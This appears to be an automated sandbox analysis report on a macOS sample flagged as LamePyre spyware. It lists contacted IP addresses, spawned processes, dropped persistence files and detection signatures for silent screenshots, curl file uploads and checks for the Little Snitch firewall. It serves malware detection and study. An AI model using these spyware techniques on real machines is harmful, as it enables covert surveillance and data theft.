  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
Behavior graph (image not reproduced; the recoverable node and edge information follows)

  • Behavior Graph ID: 65585, Sample: Pe7niErK6B, Startdate: 12/12/2018, Architecture: MAC, Score: 76
  • Network: 37.1.221.204 (ports 80, 8080; LEASEWEB-DE, Ukraine) and 17.253.57.212 (ports 49242, 80; APPLE-AUSTIN-AppleIncUS, United States); the 37.1.221.204 traffic triggers "Detected TCP or UDP traffic on non-standard ports"
  • Root processes started: xpcproxy Application Stub; xpcproxy .systemkeeper Python (two instances); 12 other processes
  • Application Stub starts bash; each .systemkeeper Python instance and the 12 other processes start Python sh (three instances plus 8 other processes)
  • bash starts bash python Python 3 and 41 other processes; the Python sh processes start sh grep and further children (2, 3, 3, 3, 3 and 21 other processes)
  • Files dropped by Python 3: /Users/henry/Libra....systemkeeper.plist (XML); /Users/henry/.system/.systemkeeper (python)
  • Signature on Python 3: Detected macOS LamePyre spyware
  • Python 3 starts Python sh, Python sh mkdir (two instances) and Python sh launchctl
  • Signatures on sh grep (under Python sh): Checks if the firewall "Little Snitch" is running; Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)
  • Signatures on the 41 other processes under bash: Uploads files by using the "curl" command and emulating a filled-in form; Explicitly creates screenshots silently (i.e. without playing sounds); Captures screenshots with shell command 'screencapture'
  • Python sh (under Python 3) starts sh ps and two sh grep processes; Python sh mkdir triggers Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)
  • Signatures on sh ps: Many shell processes execute programs via execve syscall (may be indicative of malicious behavior); Reads process information of other processes. Signature on sh grep: Checks if the firewall "Little Snitch" is running

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.